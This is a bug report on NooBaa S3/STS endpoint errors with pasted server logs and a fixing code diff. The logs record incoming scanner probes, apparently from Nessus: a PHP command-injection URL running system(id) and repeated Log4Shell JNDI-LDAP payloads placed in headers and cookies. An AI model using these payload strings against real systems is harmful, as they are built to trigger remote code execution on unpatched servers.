core.endpoint.sts.sts_rest:: STS ERROR , anonymous account and log4j error messages in s3_rest.js

### Environment info
- NooBaa Version: **VERSION**
- Platform: **Kubernetes 1.14.1 | minikube 1.1.1 | OpenShift 4.1 | other: specify**

noobaa d/s 5.17.0-20241023 build (it is in all the builds of the 5.17.0-202410XX onwards looks like 

Observed the errors and log4j related when the S3 service is stopped, hence opening this defect.. 

Just checking backward now the first occurrence in the noobaa.log is as shown below 

```
Oct  9 00:40:46 node-gui1 node[3003970]: [/3003970] ESC[36m  [LOG]ESC[39m CONSOLE:: init_rand_seed: seeding with 32 bytes
Oct  9 00:40:58 node-gui1 [2820562]: [nsfs/2820562] ESC[33m [WARN]ESC[39m core.util.signature_utils:: Anonymous request: GET / {}
Oct  9 00:40:58 node-gui1 [2820562]: [nsfs/2820562] ESC[31m[ERROR]ESC[39m core.endpoint.sts.sts_rest:: STS ERROR <?xml version="1.0" encoding="UTF-8"?><Error><Code>InternalFailure</Code><Message>The request processing has failed because of an unknown error, exception or failure.</Message><Resource>/</Resource><RequestId>m21dtme3-9q546j-fbw</RequestId></Error> GET / {} Error: The request processing has failed because of an unknown error, exception or failure.    at parse_request_body (/usr/local/noobaa-core/src/util/http_utils.js:283:15)    at Object.read_and_parse_body (/usr/local/noobaa-core/src/util/http_utils.js:247:11)    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)    at async handle_request (/usr/local/noobaa-core/src/endpoint/sts/sts_rest.js:83:5)    at async sts_rest (/usr/local/noobaa-core/src/endpoint/sts/sts_rest.js:41:9)
Oct  9 00:40:58 node-gui1 [2820562]: [nsfs/2820562] ESC[33m [WARN]ESC[39m core.util.signature_utils:: Anonymous request: GET / {}
Oct  9 00:40:58 node-gui1 [2820562]: [nsfs/2820562] ESC[31m[ERROR]ESC[39m core.endpoint.s3.s3_rest:: S3 ERROR <?xml version="1.0" encoding="UTF-8"?><Error><Code>InternalError</Code><Message>We encountered an internal error. Please try again.</Message><Resource>/</Resource><RequestId>m21dtme5-9rdlag-zam</RequestId></Error> GET / {} TypeError: Cannot read properties of undefined (reading 'split')    at parse_bucket_and_key (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:305:31)    at populate_request_additional_info_or_redirect (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:174:28)    at handle_request (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:108:28)    at Object.s3_rest [as handler] (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:66:15)    at Server.endpoint_request_handler (/usr/local/noobaa-core/src/endpoint/endpoint.js:286:28)    at Server.emit (node:events:518:28)    at Server.emit (node:domain:488:12)    at parserOnIncoming (node:_http_server:1143:12)    at HTTPParser.parserOnHeadersComplete (node:_http_common:119:17)

```
### Actual behavior
1. Following messages are observed in the noobaa.log and the gpfs.log as shown below 

noobaa.log on the node 

```
Nov  5 00:21:19 node-gui1 [1331512]: [nsfs/1331512] ESC[33m [WARN]ESC[39m core.util.signature_utils:: Anonymous request: GET / {}
Nov  5 00:21:19 node-gui1 [1331512]: [nsfs/1331512] ESC[31m[ERROR]ESC[39m core.endpoint.sts.sts_rest:: STS ERROR <?xml version="1.0" encoding="UTF-8"?><Error><Code>InternalFailure</Code><Message>The request processing has failed because of an unknown error, exception or failure.</Message><Resource>/</Resource><RequestId>m3405ihm-aj194m-680</RequestId></Error> GET / {} Error: The request processing has failed because of an unknown error, exception or failure.    at parse_request_body (/usr/local/noobaa-core/src/util/http_utils.js:283:15)    at Object.read_and_parse_body (/usr/local/noobaa-core/src/util/http_utils.js:247:11)    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)    at async handle_request (/usr/local/noobaa-core/src/endpoint/sts/sts_rest.js:83:5)    at async sts_rest (/usr/local/noobaa-core/src/endpoint/sts/sts_rest.js:41:9)
Nov  5 00:21:19 node-gui1 [1331512]: [nsfs/1331512] ESC[33m [WARN]ESC[39m core.util.signature_utils:: Anonymous request: GET / {}
Nov  5 00:21:19 node-gui1 [1331512]: [nsfs/1331512] ESC[31m[ERROR]ESC[39m core.endpoint.s3.s3_rest:: S3 ERROR <?xml version="1.0" encoding="UTF-8"?><Error><Code>InternalError</Code><Message>We encountered an internal error. Please try again.</Message><Resource>/</Resource><RequestId>m3405iic-ayluiw-1aru</RequestId></Error> GET / {} TypeError: Cannot read properties of undefined (reading 'split')    at parse_bucket_and_key (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:305:31)    at populate_request_additional_info_or_redirect (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:174:28)    at handle_request (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:108:28)    at Object.s3_rest [as handler] (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:66:15)    at Server.endpoint_request_handler (/usr/local/noobaa-core/src/endpoint/endpoint.js:286:28)    at Server.emit (node:events:518:28)    at Server.emit (node:domain:488:12)    at parserOnIncoming (node:_http_server:1143:12)    at HTTPParser.parserOnHeadersComplete (node:_http_common:119:17)

Nov  5 00:32:20 node-gui1 [1331512]: [nsfs/1331512] [ERROR] core.endpoint.s3.s3_rest:: S3 ERROR <?xml version="1.0" encoding="UTF-8"?><Error><Code>Invalid
AccessKeyId</Code><Message>The AWS access key Id you provided does not exist in our records.</Message><Resource>/</Resource><RequestId>m340joi5-a7121q-ruy</Re
questId></Error> GET / {"host":"gpfs-p10-gui1.rtp.raleigh.ibm.com:6443","accept-charset":"iso-8859-1,utf-8;q=0.9,*;q=0.1","accept-language":"en","connection":
"Keep-Alive","user-agent":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)","pragma":"no-cache","accept":"image/gif, image/x-xbitmap, image/jp
eg, image/pjpeg, image/png, */*"} Error: Account with access_key not found    at NsfsObjectSDK.load_requesting_account (/usr/local/noobaa-core/src/sdk/object_
sdk.js:232:61)    at async authorize_request (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:205:5)    at async handle_request (/usr/local/noobaa-core/src/
endpoint/s3/s3_rest.js:126:5)    at async Object.s3_rest [as handler] (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:66:9)
Nov  5 00:32:20 gpfs-p10-gui1 [1331513]: [nsfs/1331513]  [WARN] core.util.signature_utils:: Anonymous request: GET /cgi-bin/hw3.php?daysonly=0).system(id).( {
 host: 'node-gui1.rtp.raleigh.ibm.com:6443', 'accept-charset': 'iso-8859-1,utf-8;q=0.9,*;q=0.1', 'accept-language': 'en', connection: 'Keep-Alive', 'user-
agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)', pragma: 'no-cache', accept: 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, i
mage/png, */*' }
Nov  5 00:32:20 node-gui1 [1331513]: [nsfs/1331513]  [WARN] core.util.signature_utils:: Anonymous request: GET /cgi-bin/hw3.php?daysonly=0).system(id).( {
 host: 'node-gui1.rtp.raleigh.ibm.com:6443', 'accept-charset': 'iso-8859-1,utf-8;q=0.9,*;q=0.1', 'accept-language': 'en', connection: 'Keep-Alive', 'user-
agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)', pragma: 'no-cache', accept: 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, i
mage/png, */*' }
Nov  5 00:32:20 node-gui1 [1331513]: [nsfs/1331513]  [WARN] core.sdk.config_fs:: get_config_data: with config_file_path /ibm/fvt_ces_root/ces/s3-config/ac
counts/anonymous.json got an error [Error: No such file or directory] { code: 'ENOENT', context: 'Readfile _path=/ibm/fvt_ces_root/ces/s3-config/accounts/anon
ymous.json ' }
Nov  5 00:32:20 node-gui1 [1331513]: [nsfs/1331513] [ERROR] core.sdk.bucketspace_fs:: BucketSpaceFS.read_account_by_access_key: failed with error [Error:
No such file or directory] { code: 'ENOENT', context: 'Readfile _path=/ibm/fvt_ces_root/ces/s3-config/accounts/anonymous.json ' }
Nov  5 00:32:20 node-gui1 [1331513]: [nsfs/1331513] [ERROR] core.sdk.object_sdk:: load_requesting_account error: RpcError: Account with access_key not fou
nd.    at BucketSpaceFS.read_account_by_access_key (/usr/local/noobaa-core/src/sdk/bucketspace_fs.js:93:23)    at async LRUCache._load_item (/usr/local/noobaa
-core/src/util/lru_cache.js:83:22)    at async LRUCache.get_with_cache (/usr/local/noobaa-core/src/util/lru_cache.js:72:13)    at async NsfsObjectSDK.load_req
uesting_account (/usr/local/noobaa-core/src/sdk/object_sdk.js:217:39)    at async authorize_request (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:205:5)
   at async handle_request (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:126:5)    at async Object.s3_rest [as handler] (/usr/local/noobaa-core/src/endpo
int/s3/s3_rest.js:66:9) {  rpc_code: 'NO_SUCH_ACCOUNT',  rpc_data: [Error: No such file or directory] { code: 'ENOENT', context: 'Readfile _path=/ibm/fvt_ces_
root/ces/s3-config/accounts/anonymous.json ' }}
Nov  5 00:32:20 node-gui1 [1331513]: [nsfs/1331513] [ERROR] core.endpoint.s3.s3_rest:: S3 ERROR <?xml version="1.0" encoding="UTF-8"?><Error><Code>Invalid
AccessKeyId</Code><Message>The AWS access key Id you provided does not exist in our records.</Message><Resource>/cgi-bin/hw3.php?daysonly=0).system(id).(</Res
ource><RequestId>m340joiv-am64db-5w7</RequestId></Error> GET /cgi-bin/hw3.php?daysonly=0).system(id).( {"host":"node-gui1.com:6443","accep
t-charset":"iso-8859-1,utf-8;q=0.9,*;q=0.1","accept-language":"en","connection":"Keep-Alive","user-agent":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1;
Trident/4.0)","pragma":"no-cache","accept":"image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*"} Error: Account with access_key not found
at NsfsObjectSDK.load_requesting_account (/usr/local/noobaa-core/src/sdk/object_sdk.js:232:61)    at async authorize_request (/usr/local/noobaa-core/src/endpo
int/s3/s3_rest.js:205:5)    at async handle_request (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:126:5)    at async Object.s3_rest [as handler] (/usr/lo
cal/noobaa-core/src/endpoint/s3/s3_rest.js:66:9)
```
gpfs.log when  the S3 service is shutdown 
```

Nov 05 00:38:07 node-gui1 [1331512]: [nsfs/1331512]  [WARN] core.util.signature_utils:: Anonymous request: GET /cgi-bin/administrator.cgi { host: 'node-gui1.com:7443', 'accept-charset': 'iso-8859-1,utf-8;q=0.9,*;q=0.1', 'accept-language': '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4
${lower:ten}.w.nessus.org/nessus}', connection: 'Keep-Alive', referer: '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}'
, 'x-api-version': '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}', cookie: '${jndi:ldap://log4shell-generic-BSwhhXUF6
D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};JSESSIONID=${jndi:ldap://lo
g4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};SESSIONID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};PHPSESSID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};token=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};session=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}', 'user-agent': '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}', pragma: 'no-cache', 'if-modified-since': '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}', accept: '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}' }
Nov 05 00:38:07 node-gui1 [1331512]: [nsfs/1331512] [ERROR] core.endpoint.sts.sts_rest:: STS ERROR <?xml version="1.0" encoding="UTF-8"?><Error><Code>InternalFailure</Code><Message>The request processing has failed because of an unknown error, exception or failure.</Message><Resource>/cgi-bin/administrator.cgi</Resource><RequestId>m340r4t3-5kzozq-17c3</RequestId></Error> GET /cgi-bin/administrator.cgi {"host":"node-gui1.com:7443","accept-charset":"iso-8859-1,utf-8;q=0.9,*;q=0.1","accept-language":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","connection":"Keep-Alive","referer":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","x-api-version":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","cookie":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};JSESSIONID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};SESSIONID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};PHPSESSID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};token=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};session=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","user-agent":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","pragma":"no-cache","if-modified-since":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","accept":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}"} Error: The request processing has failed because of an unknown error, exception or failure.    at parse_request_body (/usr/local/noobaa-core/src/util/http_utils.js:283:15)    at Object.read_and_parse_body (/usr/local/noobaa-core/src/util/http_utils.js:247:11)    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)    at async handle_request (/usr/local/noobaa-core/src/endpoint/sts/sts_rest.js:83:5)    at async sts_rest (/usr/local/noobaa-core/src/endpoint/sts/sts_rest.js:41:9)
Nov 05 00:38:12 node-gui1 [1331513]: [nsfs/1331513]  [WARN] core.util.signature_utils:: Anonymous request: GET /cgi-bin/agorn.cgi { host: 'node-gui1.com:7443', 'accept-charset': 'iso-8859-1,utf-8;q=0.9,*;q=0.1', 'accept-language': '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:
ten}.w.nessus.org/nessus}', connection: 'Keep-Alive', referer: '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}', 'x-api
-version': '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}', cookie: '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALn
Pc4${lower:ten}.w.nessus.org/nessus}=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};JSESSIONID=${jndi:ldap://log4shell-
generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};SESSIONID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};
PHPSESSID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};token=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lo
wer:ten}.w.nessus.org/nessus};session=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}', 'user-agent': '${jndi:ldap://log
4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}', pragma: 'no-cache', 'if-modified-since': '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UB
LALnPc4${lower:ten}.w.nessus.org/nessus}', accept: '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}' }
Nov 05 00:38:12 node-gui1 [1331513]: [nsfs/1331513] [ERROR] core.endpoint.sts.sts_rest:: STS ERROR <?xml version="1.0" encoding="UTF-8"?><Error><Code>Inte
rnalFailure</Code><Message>The request processing has failed because of an unknown error, exception or failure.</Message><Resource>/cgi-bin/agorn.cgi</Resourc
e><RequestId>m340r8pb-6ds42k-trb</RequestId></Error> GET /cgi-bin/agorn.cgi {"host":"gpfs-p10-gui1.rtp.raleigh.ibm.com:7443","accept-charset":"iso-8859-1,utf-8;q=0.9,*;q=0.1","accept-language":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","connection":"Keep-Alive","referer":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","x-api-version":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","cookie":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};JSESSIONID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};SESSIONID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};PHPSESSID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};token=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};session=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","user-agent":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","pragma":"no-cache","if-modified-since":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","accept":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}"} Error: The request processing has failed because of an unknown error, exception or failure.    at parse_request_body (/usr/local/noobaa-core/src/util/http_utils.js:283:15)    at Object.read_and_parse_body (/usr/local/noobaa-core/src/util/http_utils.js:247:11)    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)    at async handle_request (/usr/local/noobaa-core/src/endpoint/sts/sts_rest.js:83:5)    at async sts_rest (/usr/local/noobaa-core/src/endpoint/sts/sts_rest.js:41:9)
Nov 05 00:38:16 node-gui1 systemd[1]: Stopping The NooBaa service....
Nov 05 00:38:16 node-gui1 systemd[1]: noobaa.service: Killing process 1331522 (node) with signal SIGKILL
....


## Expected behavior
1.

The error messages when stopping the S3 service and then continuous logs in the noobaa file should be investigated as we havent created any anonymous S3 user in the environment 

### Steps to reproduce
1.

Didn't do anything specific to the operation, it shows anonymous.json as account which is not created at all in the system 

### More information - Screenshots / Logs / Other output
Will upload the noobaa.log and the gpfs.log into the box folder https://ibm.ent.box.com/folder/292595927684

--- a/config.js
+++ b/config.js
@@ -898,7 +898,8 @@ config.NSFS_NC_CONFIG_DIR_BACKEND = '';
 config.NSFS_NC_STORAGE_BACKEND = '';
 config.ENDPOINT_PORT = Number(process.env.ENDPOINT_PORT) || 6001;
 config.ENDPOINT_SSL_PORT = Number(process.env.ENDPOINT_SSL_PORT) || 6443;
-config.ENDPOINT_SSL_STS_PORT = Number(process.env.ENDPOINT_SSL_STS_PORT) || -1;
+// Remove the NSFS condition when NSFS starts to support STS.
+config.ENDPOINT_SSL_STS_PORT = Number(process.env.ENDPOINT_SSL_STS_PORT) || (process.env.NC_NSFS_NO_DB_ENV === 'true' ? -1 : 7443);
 config.ENDPOINT_SSL_IAM_PORT = Number(process.env.ENDPOINT_SSL_IAM_PORT) || -1;
 config.ALLOW_HTTP = false;
 // config files should allow access to the owner of the files

--- a/src/endpoint/endpoint.js
+++ b/src/endpoint/endpoint.js
@@ -197,7 +197,7 @@ async function main(options = {}) {
         // START S3, STS & IAM SERVERS & CERTS
         const http_port_s3 = options.http_port || config.ENDPOINT_PORT;
         const https_port_s3 = options.https_port || config.ENDPOINT_SSL_PORT;
-        const https_port_sts = options.https_port_sts || Number(process.env.ENDPOINT_SSL_PORT_STS) || 7443; // || (process.env.NC_NSFS_NO_DB_ENV === 'true' ? -1 : 7443);
+        const https_port_sts = options.https_port_sts || config.ENDPOINT_SSL_STS_PORT;
         const https_port_iam = options.https_port_iam || config.ENDPOINT_SSL_IAM_PORT;
 
         await start_server_and_cert(SERVICES_TYPES_ENUM.S3, init_request_sdk,

--- a/src/endpoint/s3/s3_rest.js
+++ b/src/endpoint/s3/s3_rest.js
@@ -96,6 +96,13 @@ async function handle_request(req, res) {
         error_token_expired: S3Error.ExpiredToken,
         auth_token: () => signature_utils.make_auth_token_from_request(req)
     };
+    // AWS s3 returns an empty response when s3 request sends without host header.
+    if (!req.headers.host) {
+        dbg.warn('s3_rest: handle_request: S3 request is missing host header, header ', req.headers);
+        res.statusCode = 400;
+        res.end();
+        return;
+    }
     http_utils.check_headers(req, headers_options);
 
     const redirect = await populate_request_additional_info_or_redirect(req);
@@ -112,7 +119,7 @@ async function handle_request(req, res) {
     http_utils.set_cors_headers_s3(req, res, cors);
 
     if (req.method === 'OPTIONS') {
-        dbg.log1('OPTIONS!');
+        dbg.log1('s3_rest: handle_request : S3 request method is ', req.method);
         const error_code = req.headers.origin && req.headers['access-control-request-method'] ? 403 : 400;
         const res_headers = res.getHeaders(); // We will check if we found a matching rule - if no we will return error_code
         res.statusCode = res_headers['access-control-allow-origin'] && res_headers['access-control-allow-methods'] ? 200 : error_code;

